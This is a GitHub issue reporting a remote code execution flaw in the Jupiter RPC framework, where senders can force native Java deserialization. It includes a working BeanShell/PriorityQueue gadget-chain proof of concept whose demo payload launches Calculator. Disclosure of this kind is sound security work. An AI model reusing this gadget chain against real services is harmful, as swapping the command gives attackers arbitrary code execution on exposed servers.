Skip to content

Another approach capable of achieving RCE attacks #114

New issue
New issue
Open
Open
Another approach capable of achieving RCE attacks#114
@adv851

Description

@adv851
adv851
opened on Nov 2, 2023

Problem Description

As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.

Reproduce

Provider

We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
截屏2023-11-02 22 54 28

POC
截屏2023-11-02 22 46 53

At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects, one is selected here as an example, and this chain depends on the following JAR files).

<dependency>
            <groupId>org.beanshell</groupId>
            <artifactId>bsh</artifactId>
            <version>2.0b5</version>
        </dependency>

public static Object getBshObject() throws Exception {
        // BeanShell payload

        String payload =
                "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                        Strings.join( // does not support spaces in quotes
                                Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                                ",", "\"", "\"") +
                        "}).start();return new Integer(1);}";

        // Create Interpreter
        Interpreter i = new Interpreter();

        // Evaluate payload
        i.eval(payload);

        // Create InvocationHandler
        XThis xt = new XThis(i.getNameSpace(), i);
        InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

        // Create Comparator Proxy
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

        // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
        final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
        Object[] queue = new Object[] {1,1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);

        return priorityQueue;
    }

Attack Impact

Capable of executing an RCE attack, in this attack test, it is demonstrated through the launch of the calculator application.
截屏2023-11-02 22 51 49
截屏2023-11-02 22 52 28
截屏2023-11-02 22 52 50

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions